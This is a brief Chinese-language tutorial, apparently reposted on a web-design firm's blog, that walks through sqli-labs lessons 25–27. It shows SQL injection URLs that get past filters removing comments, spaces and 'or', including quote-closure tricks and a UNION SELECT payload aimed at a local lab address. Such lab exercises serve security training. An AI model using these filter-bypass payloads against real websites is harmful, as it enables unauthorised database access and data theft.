如何绕过去除特殊字符进行sql注入
本篇文章给大家分享的是有关如何绕过去除特殊字符进行sql注入,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。
创新互联是一家专业提供达拉特企业网站建设,专注与成都网站设计、成都网站建设、H5响应式网站、小程序制作等业务。10年已为达拉特众多企业、政府机构等服务。创新互联专业网站建设公司优惠进行中。
环境sqli-labs
less 25
1、输入特殊字符,报错
http://192.168.1.121/sqli/Less-25/?id=1\
2、单引号闭合
http://192.168.1.121/sqli/Less-25/?id=1' || 1=1 --+
二、闭合语句没有效果,屏蔽了-,空格,or等等
http://192.168.1.121/sqli/Less-26/?id=1' --+
三、重新构造闭合语句
http://192.168.1.121/sqli/Less-26/?id=1' ||'a'='a
less 27
一、输入特殊字符,报错
http://192.168.1.121/sqli/Less-27/?id=1'
三、通过union查询
http://192.168.1.121/sqli/Less-27/?id=1' union select 1,2,3 ||'1
以上就是如何绕过去除特殊字符进行sql注入,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。
分享文章:如何绕过去除特殊字符进行sql注入
URL链接:http://scjbc.cn/article/goopod.html